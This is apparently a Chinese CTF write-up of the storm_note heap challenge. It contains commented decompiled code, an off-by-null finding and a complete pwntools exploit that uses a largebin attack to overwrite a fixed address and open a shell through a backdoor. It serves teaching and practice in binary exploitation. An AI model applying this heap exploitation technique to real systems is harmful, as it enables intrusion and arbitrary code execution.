stormnote

b4nd1t

2019西湖论剑storm_note(largebin attack)

保护检查

1686147777312

源码分析

main

// Decompiled (IDA) menu loop of the challenge binary.  Dispatches on the
// user's numeric choice: 1 = alloc_note, 2 = edit_note, 3 = delete_note,
// 4 = exit, 666 = backdoor; anything else prints "Invalid choice".
// Marked __noreturn: every path either loops back or ends in exit()/backdoor().
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
int v3; // [rsp+4h] [rbp-Ch] BYREF   -- menu choice, filled by scanf below (declared uninitialised)
unsigned __int64 v4; // [rsp+8h] [rbp-8h]   -- saved stack-protector canary (fs:0x28)

v4 = __readfsqword(0x28u);
init_proc(argc, argv, envp);
while ( 1 )
{
// Inner loop: choice 3 (delete) is handled here and immediately re-prompts;
// any other choice breaks out to the dispatch below.
while ( 1 )
{
menu();
// scanf's return value is not checked: on non-numeric input v3 keeps its
// previous (initially indeterminate) value and is dispatched on anyway.
_isoc99_scanf("%d", &v3);
if ( v3 != 3 )
break;
delete_note();
}
if ( v3 > 3 )
{
if ( v3 == 4 )
exit(0);
if ( v3 == 666 )
backdoor();   // hidden menu item; backdoor() is itself __noreturn
LABEL_15:
puts("Invalid choice");
}
else if ( v3 == 1 )
{
alloc_note();
}
else
{
if ( v3 != 2 )
goto LABEL_15;
edit_note();
}
}
}

add

// Allocates a new note.  Picks the first empty slot of the 16-entry note[]
// table, reads a size from stdin and calloc()s exactly that many bytes,
// recording the byte count in note_size[].
// The return value is IDA's rendering of the epilogue canary check
// (canary XOR saved canary), not something callers use.
unsigned __int64 alloc_note()
{
int v1; // [rsp+0h] [rbp-10h] BYREF   -- requested size; left uninitialised if scanf fails
int i; // [rsp+4h] [rbp-Ch]   -- index of the first free slot
unsigned __int64 v3; // [rsp+8h] [rbp-8h]   -- saved stack-protector canary

v3 = __readfsqword(0x28u);
// Linear scan for the first NULL entry; i == 16 means all slots are in use.
for ( i = 0; i <= 15 && note[i]; ++i )
;
if ( i == 16 )
{
puts("full!");
}
else
{
puts("size ?");
_isoc99_scanf("%d", &v1);
// Accepted range is 1..0xFFFFF bytes (roughly 1 MiB).
if ( v1 > 0 && v1 <= 0xFFFFF )
{
// calloc zero-fills the buffer.  Its result is not checked: on failure the
// slot stays NULL while note_size[i] is still set.  note_size[i] is the
// exact allocation length and is later used by edit_note() as the read() size.
note[i] = calloc(v1, 1uLL);
note_size[i] = v1;
puts("Done");
}
else
{
puts("Invalid size");
}
}
return __readfsqword(0x28u) ^ v3;
}

edit

// Overwrites the content of an existing note with bytes read from stdin.
// The index is parsed with "%d" into an unsigned int, so negative input wraps
// to a large value and is rejected by the v1 <= 0xF bound.
//
// Off-by-null: read() may fill all note_size[v1] bytes, and the terminating 0
// is then stored at note[v1] + bytes_read.  On a full-length read that byte
// lands one past the calloc()'d region (alloc_note allocates exactly
// note_size[v1] bytes), i.e. into whatever the allocator placed directly after
// the buffer.  Mitigation: read at most note_size[v1] - 1 bytes and reject a
// negative read() result before writing the terminator.
unsigned __int64 edit_note()
{
unsigned int v1; // [rsp+0h] [rbp-10h] BYREF   -- note index
int v2; // [rsp+4h] [rbp-Ch]   -- bytes returned by read(); may be -1 on error
unsigned __int64 v3; // [rsp+8h] [rbp-8h]   -- saved stack-protector canary

v3 = __readfsqword(0x28u);
puts("Index ?");
_isoc99_scanf("%d", &v1);
if ( v1 <= 0xF && note[v1] )
{
puts("Content: ");
// Reads up to the full allocation size; no room is reserved for the terminator.
v2 = read(0, (void *)note[v1], (int)note_size[v1]);
// v2 == note_size[v1] writes one byte past the buffer; v2 == -1 writes one byte before it.
*(_BYTE *)(note[v1] + v2) = 0;
puts("Done");
}
else
{
puts("Invalid index");
}
return __readfsqword(0x28u) ^ v3;
}

edit 函数中存在 off-by-null 漏洞（结尾写入的 0 可越过缓冲区末尾一个字节）

delete

// Frees a note and clears its slot.  Both note[v1] and note_size[v1] are
// reset, so a freed slot cannot be edited or freed again through the menu
// (edit_note and this function both require note[v1] != NULL); the chunk
// overlap used in the writeup comes from edit_note's off-by-null, not from a
// dangling pointer here.
unsigned __int64 delete_note()
{
unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF   -- note index (read with "%d", negative input wraps and is rejected)
unsigned __int64 v2; // [rsp+8h] [rbp-8h]   -- saved stack-protector canary

v2 = __readfsqword(0x28u);
puts("Index ?");
_isoc99_scanf("%d", &v1);
if ( v1 <= 0xF && note[v1] )
{
free((void *)note[v1]);
note[v1] = 0LL;
note_size[v1] = 0;
}
else
{
puts("Invalid index");
}
return __readfsqword(0x28u) ^ v2;
}

backdoor

// Hidden menu entry (choice 666).  Reads up to 0x30 bytes into a 56-byte
// stack buffer (the read is bounded, so no stack overflow here) and compares
// them against the 0x30 bytes at the fixed address 0xABCD0100; on a match it
// spawns /bin/sh, otherwise it exits.  What that address holds, and whether it
// is mapped, is decided outside this function; the writeup's exploit uses it
// as the destination of its heap write.
void __noreturn backdoor()
{
char buf[56]; // [rsp+0h] [rbp-40h] BYREF   -- user-supplied key, not zero-initialised
unsigned __int64 v1; // [rsp+38h] [rbp-8h]   -- saved stack-protector canary

v1 = __readfsqword(0x28u);
puts("If you can open the lock, I will let you in");
// Return value unchecked: a short read leaves the tail of buf indeterminate,
// yet memcmp still compares the full 0x30 bytes.
read(0, buf, 0x30uLL);
if ( !memcmp(buf, (const void *)0xABCD0100LL, 0x30uLL) )
system("/bin/sh");
exit(0);
}

思路

构造两个大堆块的 chunk overlapping，进行 largebin attack，然后把堆块申请到指定位置进行改写

exp

# Proof-of-concept script from the writeup, written against pwntools and run
# interactively against the local ./pwn binary.  The helpers below wrap the
# program's menu (see main(): 1 = alloc, 2 = edit, 3 = delete, 666 = backdoor).
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
p = process("./pwn")

def debug():
    """Attach gdb to the running target (only used if the call below is uncommented)."""
    gdb.attach(p)
def add(size):
    """Menu option 1: allocate a note of `size` bytes in the first free slot."""
    p.recvuntil("Choice: ")
    p.sendline("1")
    p.recvuntil("size ?\n")
    p.sendline(str(size))
def edit(index,content):
    """Menu option 2: write `content` into note `index` (raw send, no trailing newline)."""
    p.sendlineafter("Choice: ","2")
    p.sendlineafter("Index ?\n",str(index))
    p.sendafter("Content: \n",content)
def delete(index):
    """Menu option 3: free note `index` and clear its slot."""
    p.sendlineafter("Choice: ","3")
    p.sendlineafter("Index ?\n",str(index))
# Heap layout preparation and largebin attack, as outlined in the writeup's
# 思路 section; the slot numbers in the trailing comments are the author's.
add(0x18) #0
add(0x508) #1
add(0x18) #2
add(0x18) #3
add(0x508) #4
add(0x18) #5
add(0x18) #6
payload = 'a'*0x4f0 + p64(0x500)
edit(1,payload)
edit(4,payload)
delete(1)
payload = 'a'*0x18
edit(0,payload)
add(0x18) #1
add(0x4d8) #7
delete(1)
delete(2)
add(0x30) #1
add(0x4e0) #2

delete(4)
payload = 'a'*0x18
edit(3,payload)
add(0x18) #4
add(0x4d8) #8
delete(4)
delete(5)
add(0x40) #4
edit(8,"ffff")
delete(2)
add(0x4e8)
delete(2)
content_addr = 0xabcd0100
fake_chunk = content_addr - 0x20
payload = p64(0)*2 + p64(0) + p64(0x4f1)
payload += p64(0) + p64(fake_chunk)
edit(7,payload)
payload = p64(0)*4 + p64(0) + p64(0x4e1)
payload += p64(0) + p64(fake_chunk + 8)
payload += p64(0) + p64(fake_chunk - 0x18 - 5)
edit(8,payload)
add(0x40)
payload = p64(0)*2 + p64(0)*6
edit(2,payload)
p.recv()
p.sendline("666")
p.send(p64(0)*6)

#debug()
p.interactive()

参考

从两道题剖析Largebin Attack - FreeBuf网络安全行业门户